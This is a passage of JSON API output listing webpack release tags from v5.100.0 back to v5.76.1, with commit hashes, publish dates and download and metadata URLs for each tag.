cosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"c